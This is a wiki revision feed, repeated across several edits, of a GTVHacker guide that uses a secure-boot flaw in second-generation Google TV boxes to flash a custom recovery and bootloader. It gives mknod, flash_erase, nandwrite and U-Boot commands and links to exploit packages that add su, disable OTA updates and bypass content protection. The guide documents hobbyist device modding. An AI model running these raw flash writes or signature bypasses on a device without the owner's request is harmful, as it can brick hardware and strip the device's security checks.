*To then boot from USB (try other ports if its not detected):&lt;br /&gt;
 &amp;lt;code&amp;gt;usb start; fatload usb 0:1 0x01308000 zImage 20568700; go 0x01308000 &amp;lt;/code&amp;gt;&lt;br /&gt;
: 0x01308000 is the load address, zImage is the name of the file on a vfat formatted USB drive, and 20568700 is it&#039;s filesize&lt;br /&gt;
&lt;br /&gt;
== Troubleshooting ==&lt;br /&gt;
&lt;br /&gt;
*&#039;&#039;&#039;Help! By recovery doesn&#039;t persist after a reboot?!&#039;&#039;&#039;&lt;br /&gt;
: You must use the custom recovery to install the Secure Boot update.zip file for recovery to persist, otherwise it will be overwritten on the first normal boot. Installing this .zip puts a su binary on the box, installs the flash content bypass, kills OTA updates, and persists the recovery.&lt;br /&gt;
&lt;br /&gt;
*&#039;&#039;&#039;Recovery is saying that the update.zip file cannot be found.&#039;&#039;&#039;&lt;br /&gt;
: You must have the USB drive plugged in prior to booting the box and the USB drive must be FAT32 formatted. Use &amp;quot;fdisk -l&amp;quot; to verify the device has a correctly structured partition table.&lt;br /&gt;
&lt;br /&gt;
*You can get help from us or other users at:&lt;br /&gt;
&lt;br /&gt;
[http://forum.gtvhacker.com/ GTVHacker Forums]&lt;br /&gt;
&lt;br /&gt;
[http://www.gtvhacker.com GTVHacker Wiki]&lt;br /&gt;
&lt;br /&gt;
*or you can chat with us on IRC at:&lt;br /&gt;
&lt;br /&gt;
irc.freenode.net #gtvhacker&lt;br /&gt;
&lt;br /&gt;
[http://webchat.freenode.net/?randomnick=1&amp;amp;channels=gtvhacker&amp;amp;uio=d4 Freenode Webchat]&lt;br /&gt;
&lt;br /&gt;
(Someone may not be around right away to help, make sure to be willing to wait for a response)&lt;br /&gt;
&lt;br /&gt;
== Download ==&lt;br /&gt;
&#039;&#039;&#039;GTVHacker SecureBoot update.zip&#039;&#039;&#039;&lt;br /&gt;
*[http://download.gtvhacker.com/file/generic/GTVHacker-secureboot-update.zip SecureBoot Update.zip]&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Custom Recovery:&#039;&#039;&#039;&lt;br /&gt;
*[http://download.gtvhacker.com/file/asus/Asus_Cube_Secure_Boot_Exploit_Package-GTVHacker.zip Asus Cube Recovery]&lt;br /&gt;
*[http://download.gtvhacker.com/file/pulse/Hisense_Pulse_Secure_Boot_Exploit_Package-GTVHacker.zip Hisense Pulse Recovery]&lt;br /&gt;
*[http://download.gtvhacker.com/file/sony/Sony_NSZ-GS7-GS8_Secure_Boot_Exploit_Package-GTVHacker.zip Sony NSZ-GS7 and NSZ-GS8]&lt;/div&gt;</summary>
		<author><name>CJ</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=Installing_Custom_Recovery_(Gen_2_Only)&amp;diff=1204</id>
		<title>Installing Custom Recovery (Gen 2 Only)</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=Installing_Custom_Recovery_(Gen_2_Only)&amp;diff=1204"/>
		<updated>2013-08-08T22:41:04Z</updated>

		<summary type="html">&lt;p&gt;CJ: /* Developers Only (SONY) (UART console required) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== About ==&lt;br /&gt;
This custom recovery currently exploits a secure boot flaw in the second generation of Google TV devices to allow booting an unsigned kernel on the Google TV. Below we allow users to install a custom recovery on the Google TV which allows full read write access to the device as well as an automated process for installing updates (of which we do not check the signature.) &lt;br /&gt;
&lt;br /&gt;
== Devices ==&lt;br /&gt;
*ASUS Cube&lt;br /&gt;
*Hisense Pulse&lt;br /&gt;
*Sony NSZ-GS7/GS8&lt;br /&gt;
&lt;br /&gt;
== Warnings ==&lt;br /&gt;
*This will definitely void your warranty, if you want to keep your warranty please do not do any of the steps in this guide.&lt;br /&gt;
*This may brick your GTV. It shouldn&#039;t, but it still might!&lt;br /&gt;
&lt;br /&gt;
== Tools Needed ==&lt;br /&gt;
*Linux Live CD or Linux Installed&lt;br /&gt;
*A vulnerable Google TV device.&lt;br /&gt;
*1 USB Drive (to be formatted)&lt;br /&gt;
&lt;br /&gt;
== Pre-Setup ==&lt;br /&gt;
#Boot Linux (Live CD or Install)&lt;br /&gt;
#Download Custom Recovery Package for Device&lt;br /&gt;
#Unzip Custom Recovery Package&lt;br /&gt;
&lt;br /&gt;
== Custom Recovery Steps (Cube and Pulse) ==&lt;br /&gt;
#Format a drive NTFS, and mount it.&lt;br /&gt;
#cd to the drive, and issue the following commands:&lt;br /&gt;
#: The major and minor hash for these commands is pulled from an &amp;quot;ls -l&amp;quot; on /dev/mtd for the recovery mtd.&lt;br /&gt;
#: &amp;lt;code&amp;gt;mknod gtvhacker-recovery c 90 32&amp;lt;/code&amp;gt;&lt;br /&gt;
#Then, copy over our files for your specific box, to the root of your NTFS flash drive&lt;br /&gt;
#: nandwrite&lt;br /&gt;
#: flash_erase&lt;br /&gt;
#: CustomRecovery-VENDOR-MODEL-GTVHACKER.bin&lt;br /&gt;
#Unmount the drive, and insert it into your Google TV.&lt;br /&gt;
#Connect via adb, and issue the shell command.&lt;br /&gt;
#To find out what USB drive you plugged in, issue this command:&lt;br /&gt;
#: &amp;lt;code&amp;gt;ls /mnt/media/&lt;br /&gt;
#: cd /mnt/media/usb.LABEL (where label = the rest from above)&amp;lt;/code&amp;gt;&lt;br /&gt;
#Now, issue these commands:&lt;br /&gt;
#: &amp;lt;code&amp;gt;cp flash_erase /data/local/tmp&lt;br /&gt;
#: cp nandwrite /data/local/tmp&lt;br /&gt;
#: chmod 755 /data/local/tmp/flash_erase&lt;br /&gt;
#: chmod 755 /data/local/tmp/nandwrite&lt;br /&gt;
#: cd /data/local/tmp&amp;lt;/code&amp;gt;&lt;br /&gt;
#Finally, to install the recovery (where usb.LABEL is the name of your usb drive from above):&lt;br /&gt;
#: &amp;lt;code&amp;gt;./flash_erase /mnt/media/usb.LABEL/gtvhacker-recovery 0 0&lt;br /&gt;
#: ./nandwrite -p /mnt/media/usb.LABEL/gtvhacker-recovery /mnt/media/usb.LABEL/CustomRecovery-VENDOR-MODEL-GTVHACKER.bin&amp;lt;/code&amp;gt;&lt;br /&gt;
#Issue an adb reboot, and you have a custom recovery.&lt;br /&gt;
&lt;br /&gt;
== Developers Only (CUBE, PULSE) (UART console required) ==&lt;br /&gt;
&#039;&#039;&#039; We are preparing a update package to be installed from the recovery GUI which will automate the custom bootloader install.&#039;&#039;&#039;&lt;br /&gt;
To install the uboot custom bootloader (developers only, UART console required):&lt;br /&gt;
#Format a drive NTFS, and mount it.&lt;br /&gt;
#cd to the drive, and issue the following commands:&lt;br /&gt;
#: The major and minor hash for these commands is pulled from an &amp;quot;ls -l&amp;quot; on /dev/mtd for the kernel mtd.&lt;br /&gt;
#: &amp;lt;code&amp;gt;mknod gtvhacker-kernel c 90 16&amp;lt;/code&amp;gt;&lt;br /&gt;
#Then, copy over our files for your specific box, to the root of your NTFS flash drive&lt;br /&gt;
#: nandwrite&lt;br /&gt;
#: flash_erase&lt;br /&gt;
#: uboot-VENDOR-MODEL-GTVHACKER.bin&lt;br /&gt;
#Unmount the drive, and insert it into your Google TV.&lt;br /&gt;
#Connect via adb, and issue the shell command.&lt;br /&gt;
#To find out what USB drive you plugged in, issue this command:&lt;br /&gt;
#: &amp;lt;code&amp;gt;ls /mnt/media/&lt;br /&gt;
#: cd /mnt/media/usb.LABEL (where label = the rest from above)&amp;lt;/code&amp;gt;&lt;br /&gt;
#Now, issue these commands:&lt;br /&gt;
#: &amp;lt;code&amp;gt;cp flash_erase /data/local/tmp&lt;br /&gt;
#: cp nandwrite /data/local/tmp&lt;br /&gt;
#: chmod 755 /data/local/tmp/flash_erase&lt;br /&gt;
#: chmod 755 /data/local/tmp/nandwrite&lt;br /&gt;
#: cd /data/local/tmp&amp;lt;/code&amp;gt;&lt;br /&gt;
#Finally, to install the custom bootloader (where usb.LABEL is the name of your usb drive from above):&lt;br /&gt;
#: &amp;lt;code&amp;gt;./flash_erase /mnt/media/usb.LABEL/gtvhacker-kernel 0 0&lt;br /&gt;
#: ./nandwrite -p /mnt/media/usb.LABEL/gtvhacker-mtd8 /mnt/media/usb-LABEL/uboot-VENDOR-MODEL-GTVHACKER.bin&amp;lt;/code&amp;gt;&lt;br /&gt;
#Issue an adb reboot, and you have a custom DEVELOPER ONLY bootloader.&lt;br /&gt;
*To then boot from USB (try other ports if its not detected):&lt;br /&gt;
 &amp;lt;code&amp;gt;usb start; fatload usb 0:1 0x01308000 zImage 20568700; go 0x01308000 &amp;lt;/code&amp;gt;&lt;br /&gt;
: 0x01308000 is the load address, zImage is the name of the file on a vfat formatted USB drive, and 20568700 is it&#039;s filesize&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Custom Recovery Steps (Sony) ==&lt;br /&gt;
#Format a drive NTFS, and mount it.&lt;br /&gt;
#cd to the drive, and issue the following commands:&lt;br /&gt;
#: The major and minor hash for these commands is pulled from an &amp;quot;ls -l&amp;quot; on /dev/block for the recovery block.&lt;br /&gt;
#: &amp;lt;code&amp;gt;mknod gtvhacker-recovery b 179 10&amp;lt;/code&amp;gt;&lt;br /&gt;
#Then, copy over our files for your specific box, to the root of your NTFS flash drive&lt;br /&gt;
#: CustomRecovery-VENDOR-MODEL-GTVHACKER.bin&lt;br /&gt;
#Unmount the drive, and insert it into your Google TV.&lt;br /&gt;
#Connect via adb, and issue the shell command.&lt;br /&gt;
#To find out what USB drive you plugged in, issue this command:&lt;br /&gt;
#: &amp;lt;code&amp;gt;ls /mnt/media/&lt;br /&gt;
#: cd /mnt/media/usb.LABEL (where label = the rest from above)&amp;lt;/code&amp;gt;&lt;br /&gt;
#Install the recovery (where usb.LABEL is the name of your usb drive from above):&lt;br /&gt;
#: &amp;lt;code&amp;gt;&lt;br /&gt;
#: cp /mnt/media/usb.LABEL/CustomRecovery-VENDOR-MODEL-GTVHACKER.bin /mnt/media/usb.LABEL/gtvhacker-recovery&amp;lt;/code&amp;gt;&lt;br /&gt;
#Issue an adb reboot, and you have a custom recovery.&lt;br /&gt;
&lt;br /&gt;
== Developers Only (SONY) (UART console required) ==&lt;br /&gt;
&#039;&#039;&#039; We are preparing a update package to be installed from the recovery GUI which will automate the custom bootloader install.&#039;&#039;&#039;&lt;br /&gt;
To install the uboot custom bootloader (developers only, UART console required):&lt;br /&gt;
#Format a drive NTFS, and mount it.&lt;br /&gt;
#cd to the drive, and issue the following commands:&lt;br /&gt;
#: The major and minor hash for these commands is pulled from an &amp;quot;ls -l&amp;quot; on /dev/mtd for the kernel mtd.&lt;br /&gt;
#: &amp;lt;code&amp;gt;mknod gtvhacker-kernel b 179 7&amp;lt;/code&amp;gt;&lt;br /&gt;
#Then, copy over our files for your specific box, to the root of your NTFS flash drive&lt;br /&gt;
#: uboot-VENDOR-MODEL-GTVHACKER.bin&lt;br /&gt;
#Unmount the drive, and insert it into your Google TV.&lt;br /&gt;
#Connect via adb, and issue the shell command.&lt;br /&gt;
#Install the custom bootloader (where usb.LABEL is the name of your usb drive from above):&lt;br /&gt;
#: &amp;lt;code&amp;gt;&lt;br /&gt;
#: cp /mnt/media/usb-LABEL/uboot-VENDOR-MODEL-GTVHACKER.bin /mnt/media/usb.LABEL/gtvhacker-mtd8&amp;lt;/code&amp;gt;&lt;br /&gt;
#Issue an adb reboot, and you have a custom DEVELOPER ONLY bootloader.&lt;br /&gt;
*To then boot from USB (try other ports if its not detected):&lt;br /&gt;
 &amp;lt;code&amp;gt;usb start; fatload usb 0:1 0x01308000 zImage 20568700; go 0x01308000 &amp;lt;/code&amp;gt;&lt;br /&gt;
: 0x01308000 is the load address, zImage is the name of the file on a vfat formatted USB drive, and 20568700 is it&#039;s filesize&lt;br /&gt;
&lt;br /&gt;
== Troubleshooting ==&lt;br /&gt;
&lt;br /&gt;
*You can get help from us or other users at:&lt;br /&gt;
&lt;br /&gt;
[http://forum.gtvhacker.com/ GTVHacker Forums]&lt;br /&gt;
&lt;br /&gt;
[http://www.gtvhacker.com GTVHacker Wiki]&lt;br /&gt;
&lt;br /&gt;
*or you can chat with us on IRC at:&lt;br /&gt;
&lt;br /&gt;
irc.freenode.net #gtvhacker&lt;br /&gt;
&lt;br /&gt;
[http://webchat.freenode.net/?randomnick=1&amp;amp;channels=gtvhacker&amp;amp;uio=d4 Freenode Webchat]&lt;br /&gt;
&lt;br /&gt;
(Someone may not be around right away to help, make sure to be willing to wait for a response)&lt;br /&gt;
&lt;br /&gt;
== Download ==&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Custom Recovery:&#039;&#039;&#039;&lt;br /&gt;
*[http://download.gtvhacker.com/file/asus/Asus_Cube_Secure_Boot_Exploit_Package-GTVHacker.zip Asus Cube Recovery]&lt;br /&gt;
*[http://download.gtvhacker.com/file/pulse/Hisense_Pulse_Secure_Boot_Exploit_Package-GTVHacker.zip Hisense Pulse Recovery]&lt;br /&gt;
*[http://download.gtvhacker.com/file/sony/Sony_NSZ-GS7-GS8_Secure_Boot_Exploit_Package-GTVHacker.zip Sony NSZ-GS7 and NSZ-GS8]&lt;/div&gt;</summary>
		<author><name>CJ</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=Installing_Custom_Recovery_(Gen_2_Only)&amp;diff=1203</id>
		<title>Installing Custom Recovery (Gen 2 Only)</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=Installing_Custom_Recovery_(Gen_2_Only)&amp;diff=1203"/>
		<updated>2013-08-08T22:40:27Z</updated>

		<summary type="html">&lt;p&gt;CJ: /* Custom Recovery Steps (Sony) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== About ==&lt;br /&gt;
This custom recovery currently exploits a secure boot flaw in the second generation of Google TV devices to allow booting an unsigned kernel on the Google TV. Below we allow users to install a custom recovery on the Google TV which allows full read write access to the device as well as an automated process for installing updates (of which we do not check the signature.) &lt;br /&gt;
&lt;br /&gt;
== Devices ==&lt;br /&gt;
*ASUS Cube&lt;br /&gt;
*Hisense Pulse&lt;br /&gt;
*Sony NSZ-GS7/GS8&lt;br /&gt;
&lt;br /&gt;
== Warnings ==&lt;br /&gt;
*This will definitely void your warranty, if you want to keep your warranty please do not do any of the steps in this guide.&lt;br /&gt;
*This may brick your GTV. It shouldn&#039;t, but it still might!&lt;br /&gt;
&lt;br /&gt;
== Tools Needed ==&lt;br /&gt;
*Linux Live CD or Linux Installed&lt;br /&gt;
*A vulnerable Google TV device.&lt;br /&gt;
*1 USB Drive (to be formatted)&lt;br /&gt;
&lt;br /&gt;
== Pre-Setup ==&lt;br /&gt;
#Boot Linux (Live CD or Install)&lt;br /&gt;
#Download Custom Recovery Package for Device&lt;br /&gt;
#Unzip Custom Recovery Package&lt;br /&gt;
&lt;br /&gt;
== Custom Recovery Steps (Cube and Pulse) ==&lt;br /&gt;
#Format a drive NTFS, and mount it.&lt;br /&gt;
#cd to the drive, and issue the following commands:&lt;br /&gt;
#: The major and minor hash for these commands is pulled from an &amp;quot;ls -l&amp;quot; on /dev/mtd for the recovery mtd.&lt;br /&gt;
#: &amp;lt;code&amp;gt;mknod gtvhacker-recovery c 90 32&amp;lt;/code&amp;gt;&lt;br /&gt;
#Then, copy over our files for your specific box, to the root of your NTFS flash drive&lt;br /&gt;
#: nandwrite&lt;br /&gt;
#: flash_erase&lt;br /&gt;
#: CustomRecovery-VENDOR-MODEL-GTVHACKER.bin&lt;br /&gt;
#Unmount the drive, and insert it into your Google TV.&lt;br /&gt;
#Connect via adb, and issue the shell command.&lt;br /&gt;
#To find out what USB drive you plugged in, issue this command:&lt;br /&gt;
#: &amp;lt;code&amp;gt;ls /mnt/media/&lt;br /&gt;
#: cd /mnt/media/usb.LABEL (where label = the rest from above)&amp;lt;/code&amp;gt;&lt;br /&gt;
#Now, issue these commands:&lt;br /&gt;
#: &amp;lt;code&amp;gt;cp flash_erase /data/local/tmp&lt;br /&gt;
#: cp nandwrite /data/local/tmp&lt;br /&gt;
#: chmod 755 /data/local/tmp/flash_erase&lt;br /&gt;
#: chmod 755 /data/local/tmp/nandwrite&lt;br /&gt;
#: cd /data/local/tmp&amp;lt;/code&amp;gt;&lt;br /&gt;
#Finally, to install the recovery (where usb.LABEL is the name of your usb drive from above):&lt;br /&gt;
#: &amp;lt;code&amp;gt;./flash_erase /mnt/media/usb.LABEL/gtvhacker-recovery 0 0&lt;br /&gt;
#: ./nandwrite -p /mnt/media/usb.LABEL/gtvhacker-recovery /mnt/media/usb.LABEL/CustomRecovery-VENDOR-MODEL-GTVHACKER.bin&amp;lt;/code&amp;gt;&lt;br /&gt;
#Issue an adb reboot, and you have a custom recovery.&lt;br /&gt;
&lt;br /&gt;
== Developers Only (CUBE, PULSE) (UART console required) ==&lt;br /&gt;
&#039;&#039;&#039; We are preparing a update package to be installed from the recovery GUI which will automate the custom bootloader install.&#039;&#039;&#039;&lt;br /&gt;
To install the uboot custom bootloader (developers only, UART console required):&lt;br /&gt;
#Format a drive NTFS, and mount it.&lt;br /&gt;
#cd to the drive, and issue the following commands:&lt;br /&gt;
#: The major and minor hash for these commands is pulled from an &amp;quot;ls -l&amp;quot; on /dev/mtd for the kernel mtd.&lt;br /&gt;
#: &amp;lt;code&amp;gt;mknod gtvhacker-kernel c 90 16&amp;lt;/code&amp;gt;&lt;br /&gt;
#Then, copy over our files for your specific box, to the root of your NTFS flash drive&lt;br /&gt;
#: nandwrite&lt;br /&gt;
#: flash_erase&lt;br /&gt;
#: uboot-VENDOR-MODEL-GTVHACKER.bin&lt;br /&gt;
#Unmount the drive, and insert it into your Google TV.&lt;br /&gt;
#Connect via adb, and issue the shell command.&lt;br /&gt;
#To find out what USB drive you plugged in, issue this command:&lt;br /&gt;
#: &amp;lt;code&amp;gt;ls /mnt/media/&lt;br /&gt;
#: cd /mnt/media/usb.LABEL (where label = the rest from above)&amp;lt;/code&amp;gt;&lt;br /&gt;
#Now, issue these commands:&lt;br /&gt;
#: &amp;lt;code&amp;gt;cp flash_erase /data/local/tmp&lt;br /&gt;
#: cp nandwrite /data/local/tmp&lt;br /&gt;
#: chmod 755 /data/local/tmp/flash_erase&lt;br /&gt;
#: chmod 755 /data/local/tmp/nandwrite&lt;br /&gt;
#: cd /data/local/tmp&amp;lt;/code&amp;gt;&lt;br /&gt;
#Finally, to install the custom bootloader (where usb.LABEL is the name of your usb drive from above):&lt;br /&gt;
#: &amp;lt;code&amp;gt;./flash_erase /mnt/media/usb.LABEL/gtvhacker-kernel 0 0&lt;br /&gt;
#: ./nandwrite -p /mnt/media/usb.LABEL/gtvhacker-mtd8 /mnt/media/usb-LABEL/uboot-VENDOR-MODEL-GTVHACKER.bin&amp;lt;/code&amp;gt;&lt;br /&gt;
#Issue an adb reboot, and you have a custom DEVELOPER ONLY bootloader.&lt;br /&gt;
*To then boot from USB (try other ports if its not detected):&lt;br /&gt;
 &amp;lt;code&amp;gt;usb start; fatload usb 0:1 0x01308000 zImage 20568700; go 0x01308000 &amp;lt;/code&amp;gt;&lt;br /&gt;
: 0x01308000 is the load address, zImage is the name of the file on a vfat formatted USB drive, and 20568700 is it&#039;s filesize&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Custom Recovery Steps (Sony) ==&lt;br /&gt;
#Format a drive NTFS, and mount it.&lt;br /&gt;
#cd to the drive, and issue the following commands:&lt;br /&gt;
#: The major and minor hash for these commands is pulled from an &amp;quot;ls -l&amp;quot; on /dev/block for the recovery block.&lt;br /&gt;
#: &amp;lt;code&amp;gt;mknod gtvhacker-recovery b 179 10&amp;lt;/code&amp;gt;&lt;br /&gt;
#Then, copy over our files for your specific box, to the root of your NTFS flash drive&lt;br /&gt;
#: CustomRecovery-VENDOR-MODEL-GTVHACKER.bin&lt;br /&gt;
#Unmount the drive, and insert it into your Google TV.&lt;br /&gt;
#Connect via adb, and issue the shell command.&lt;br /&gt;
#To find out what USB drive you plugged in, issue this command:&lt;br /&gt;
#: &amp;lt;code&amp;gt;ls /mnt/media/&lt;br /&gt;
#: cd /mnt/media/usb.LABEL (where label = the rest from above)&amp;lt;/code&amp;gt;&lt;br /&gt;
#Install the recovery (where usb.LABEL is the name of your usb drive from above):&lt;br /&gt;
#: &amp;lt;code&amp;gt;&lt;br /&gt;
#: cp /mnt/media/usb.LABEL/CustomRecovery-VENDOR-MODEL-GTVHACKER.bin /mnt/media/usb.LABEL/gtvhacker-recovery&amp;lt;/code&amp;gt;&lt;br /&gt;
#Issue an adb reboot, and you have a custom recovery.&lt;br /&gt;
&lt;br /&gt;
== Developers Only (SONY) (UART console required) ==&lt;br /&gt;
&#039;&#039;&#039; We are preparing a update package to be installed from the recovery GUI which will automate the custom bootloader install.&#039;&#039;&#039;&lt;br /&gt;
To install the uboot custom bootloader (developers only, UART console required):&lt;br /&gt;
#Format a drive NTFS, and mount it.&lt;br /&gt;
#cd to the drive, and issue the following commands:&lt;br /&gt;
#: The major and minor hash for these commands is pulled from an &amp;quot;ls -l&amp;quot; on /dev/mtd for the kernel mtd.&lt;br /&gt;
#: &amp;lt;code&amp;gt;mknod gtvhacker-kernel b 179 7&amp;lt;/code&amp;gt;&lt;br /&gt;
#Then, copy over our files for your specific box, to the root of your NTFS flash drive&lt;br /&gt;
#: uboot-VENDOR-MODEL-GTVHACKER.bin&lt;br /&gt;
#Unmount the drive, and insert it into your Google TV.&lt;br /&gt;
#Connect via adb, and issue the shell command.&lt;br /&gt;
#Install the custom bootloader (where usb.LABEL is the name of your usb drive from above):&lt;br /&gt;
#: &amp;lt;code&amp;gt;cd /data/local/tmp&lt;br /&gt;
#: cp /mnt/media/usb-LABEL/uboot-VENDOR-MODEL-GTVHACKER.bin /mnt/media/usb.LABEL/gtvhacker-mtd8&amp;lt;/code&amp;gt;&lt;br /&gt;
#Issue an adb reboot, and you have a custom DEVELOPER ONLY bootloader.&lt;br /&gt;
*To then boot from USB (try other ports if its not detected):&lt;br /&gt;
 &amp;lt;code&amp;gt;usb start; fatload usb 0:1 0x01308000 zImage 20568700; go 0x01308000 &amp;lt;/code&amp;gt;&lt;br /&gt;
: 0x01308000 is the load address, zImage is the name of the file on a vfat formatted USB drive, and 20568700 is it&#039;s filesize&lt;br /&gt;
&lt;br /&gt;
== Troubleshooting ==&lt;br /&gt;
&lt;br /&gt;
*You can get help from us or other users at:&lt;br /&gt;
&lt;br /&gt;
[http://forum.gtvhacker.com/ GTVHacker Forums]&lt;br /&gt;
&lt;br /&gt;
[http://www.gtvhacker.com GTVHacker Wiki]&lt;br /&gt;
&lt;br /&gt;
*or you can chat with us on IRC at:&lt;br /&gt;
&lt;br /&gt;
irc.freenode.net #gtvhacker&lt;br /&gt;
&lt;br /&gt;
[http://webchat.freenode.net/?randomnick=1&amp;amp;channels=gtvhacker&amp;amp;uio=d4 Freenode Webchat]&lt;br /&gt;
&lt;br /&gt;
(Someone may not be around right away to help, make sure to be willing to wait for a response)&lt;br /&gt;
&lt;br /&gt;
== Download ==&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Custom Recovery:&#039;&#039;&#039;&lt;br /&gt;
*[http://download.gtvhacker.com/file/asus/Asus_Cube_Secure_Boot_Exploit_Package-GTVHacker.zip Asus Cube Recovery]&lt;br /&gt;
*[http://download.gtvhacker.com/file/pulse/Hisense_Pulse_Secure_Boot_Exploit_Package-GTVHacker.zip Hisense Pulse Recovery]&lt;br /&gt;
*[http://download.gtvhacker.com/file/sony/Sony_NSZ-GS7-GS8_Secure_Boot_Exploit_Package-GTVHacker.zip Sony NSZ-GS7 and NSZ-GS8]&lt;/div&gt;</summary>
		<author><name>CJ</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=Installing_Custom_Recovery_(Gen_2_Only)&amp;diff=1202</id>
		<title>Installing Custom Recovery (Gen 2 Only)</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=Installing_Custom_Recovery_(Gen_2_Only)&amp;diff=1202"/>
		<updated>2013-08-07T23:58:03Z</updated>

		<summary type="html">&lt;p&gt;CJ: /* Developers Only (SONY) (UART console required) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== About ==&lt;br /&gt;
This custom recovery currently exploits a secure boot flaw in the second generation of Google TV devices to allow booting an unsigned kernel on the Google TV. Below we allow users to install a custom recovery on the Google TV which allows full read write access to the device as well as an automated process for installing updates (of which we do not check the signature.) &lt;br /&gt;
&lt;br /&gt;
== Devices ==&lt;br /&gt;
*ASUS Cube&lt;br /&gt;
*Hisense Pulse&lt;br /&gt;
*Sony NSZ-GS7/GS8&lt;br /&gt;
&lt;br /&gt;
== Warnings ==&lt;br /&gt;
*This will definitely void your warranty, if you want to keep your warranty please do not do any of the steps in this guide.&lt;br /&gt;
*This may brick your GTV. It shouldn&#039;t, but it still might!&lt;br /&gt;
&lt;br /&gt;
== Tools Needed ==&lt;br /&gt;
*Linux Live CD or Linux Installed&lt;br /&gt;
*A vulnerable Google TV device.&lt;br /&gt;
*1 USB Drive (to be formatted)&lt;br /&gt;
&lt;br /&gt;
== Pre-Setup ==&lt;br /&gt;
#Boot Linux (Live CD or Install)&lt;br /&gt;
#Download Custom Recovery Package for Device&lt;br /&gt;
#Unzip Custom Recovery Package&lt;br /&gt;
&lt;br /&gt;
== Custom Recovery Steps (Cube and Pulse) ==&lt;br /&gt;
#Format a drive NTFS, and mount it.&lt;br /&gt;
#cd to the drive, and issue the following commands:&lt;br /&gt;
#: The major and minor hash for these commands is pulled from an &amp;quot;ls -l&amp;quot; on /dev/mtd for the recovery mtd.&lt;br /&gt;
#: &amp;lt;code&amp;gt;mknod gtvhacker-recovery c 90 32&amp;lt;/code&amp;gt;&lt;br /&gt;
#Then, copy over our files for your specific box, to the root of your NTFS flash drive&lt;br /&gt;
#: nandwrite&lt;br /&gt;
#: flash_erase&lt;br /&gt;
#: CustomRecovery-VENDOR-MODEL-GTVHACKER.bin&lt;br /&gt;
#Unmount the drive, and insert it into your Google TV.&lt;br /&gt;
#Connect via adb, and issue the shell command.&lt;br /&gt;
#To find out what USB drive you plugged in, issue this command:&lt;br /&gt;
#: &amp;lt;code&amp;gt;ls /mnt/media/&lt;br /&gt;
#: cd /mnt/media/usb.LABEL (where label = the rest from above)&amp;lt;/code&amp;gt;&lt;br /&gt;
#Now, issue these commands:&lt;br /&gt;
#: &amp;lt;code&amp;gt;cp flash_erase /data/local/tmp&lt;br /&gt;
#: cp nandwrite /data/local/tmp&lt;br /&gt;
#: chmod 755 /data/local/tmp/flash_erase&lt;br /&gt;
#: chmod 755 /data/local/tmp/nandwrite&lt;br /&gt;
#: cd /data/local/tmp&amp;lt;/code&amp;gt;&lt;br /&gt;
#Finally, to install the recovery (where usb.LABEL is the name of your usb drive from above):&lt;br /&gt;
#: &amp;lt;code&amp;gt;./flash_erase /mnt/media/usb.LABEL/gtvhacker-recovery 0 0&lt;br /&gt;
#: ./nandwrite -p /mnt/media/usb.LABEL/gtvhacker-recovery /mnt/media/usb.LABEL/CustomRecovery-VENDOR-MODEL-GTVHACKER.bin&amp;lt;/code&amp;gt;&lt;br /&gt;
#Issue an adb reboot, and you have a custom recovery.&lt;br /&gt;
&lt;br /&gt;
== Developers Only (CUBE, PULSE) (UART console required) ==&lt;br /&gt;
&#039;&#039;&#039; We are preparing a update package to be installed from the recovery GUI which will automate the custom bootloader install.&#039;&#039;&#039;&lt;br /&gt;
To install the uboot custom bootloader (developers only, UART console required):&lt;br /&gt;
#Format a drive NTFS, and mount it.&lt;br /&gt;
#cd to the drive, and issue the following commands:&lt;br /&gt;
#: The major and minor hash for these commands is pulled from an &amp;quot;ls -l&amp;quot; on /dev/mtd for the kernel mtd.&lt;br /&gt;
#: &amp;lt;code&amp;gt;mknod gtvhacker-kernel c 90 16&amp;lt;/code&amp;gt;&lt;br /&gt;
#Then, copy over our files for your specific box, to the root of your NTFS flash drive&lt;br /&gt;
#: nandwrite&lt;br /&gt;
#: flash_erase&lt;br /&gt;
#: uboot-VENDOR-MODEL-GTVHACKER.bin&lt;br /&gt;
#Unmount the drive, and insert it into your Google TV.&lt;br /&gt;
#Connect via adb, and issue the shell command.&lt;br /&gt;
#To find out what USB drive you plugged in, issue this command:&lt;br /&gt;
#: &amp;lt;code&amp;gt;ls /mnt/media/&lt;br /&gt;
#: cd /mnt/media/usb.LABEL (where label = the rest from above)&amp;lt;/code&amp;gt;&lt;br /&gt;
#Now, issue these commands:&lt;br /&gt;
#: &amp;lt;code&amp;gt;cp flash_erase /data/local/tmp&lt;br /&gt;
#: cp nandwrite /data/local/tmp&lt;br /&gt;
#: chmod 755 /data/local/tmp/flash_erase&lt;br /&gt;
#: chmod 755 /data/local/tmp/nandwrite&lt;br /&gt;
#: cd /data/local/tmp&amp;lt;/code&amp;gt;&lt;br /&gt;
#Finally, to install the custom bootloader (where usb.LABEL is the name of your usb drive from above):&lt;br /&gt;
#: &amp;lt;code&amp;gt;./flash_erase /mnt/media/usb.LABEL/gtvhacker-kernel 0 0&lt;br /&gt;
#: ./nandwrite -p /mnt/media/usb.LABEL/gtvhacker-mtd8 /mnt/media/usb-LABEL/uboot-VENDOR-MODEL-GTVHACKER.bin&amp;lt;/code&amp;gt;&lt;br /&gt;
#Issue an adb reboot, and you have a custom DEVELOPER ONLY bootloader.&lt;br /&gt;
*To then boot from USB (try other ports if its not detected):&lt;br /&gt;
 &amp;lt;code&amp;gt;usb start; fatload usb 0:1 0x01308000 zImage 20568700; go 0x01308000 &amp;lt;/code&amp;gt;&lt;br /&gt;
: 0x01308000 is the load address, zImage is the name of the file on a vfat formatted USB drive, and 20568700 is it&#039;s filesize&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Custom Recovery Steps (Sony) ==&lt;br /&gt;
